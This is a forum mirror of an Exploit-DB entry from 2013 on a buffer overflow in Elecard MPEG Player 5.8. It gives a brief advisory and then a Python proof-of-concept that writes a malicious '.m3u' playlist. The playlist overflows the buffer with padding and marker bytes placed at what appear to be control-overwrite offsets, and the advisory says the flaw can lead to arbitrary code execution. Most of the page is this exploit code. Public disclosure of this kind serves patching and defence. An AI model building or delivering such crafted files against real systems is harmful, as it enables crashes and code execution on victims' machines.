- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 38498
- Проверка EDB
-
- Пройдено
- Автор
- METACOM
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- N/A
- Дата публикации
- 2013-04-27
Elecard MPEG Player - '.m3u' File Buffer Overflow
Код:
source: https://www.securityfocus.com/bid/59534/info
Elecard MPEG Player is prone to a buffer-overflow vulnerability because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.
Attackers can execute arbitrary code in the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
Elecard MPEG Player 5.8 is vulnerable; other versions may also be affected.
#!/usr/bin/python
# Exploit Title:Elecard MPEG Player 5.8 Local PoC
# Download link :www.elecard.com/assets/files/distribs/mpeg-player/EMpgPlayer.zip
# Product: Vulnerable
# Elecard MPEG Player,Elecard AVC HD Player
# RST
# Date (found): 27.04.2013
# Date (publish): 27.04.2013
# Author: metacom
# version:5.8.121004
# Category: poc
# Tested on: windows 7 German
head="#EXTM3U\n"
head+="#EXTINF:153,Artist - song\n"
filename= "elecard.m3u"
buffer= "\x41" * 783
buffer+="\x42" * 4
buffer+="\x43" * 4
buffer+="\x44" * 25000
textfile = open(filename , 'w')
textfile.write(head+buffer)
textfile.close()- Источник
- www.exploit-db.com
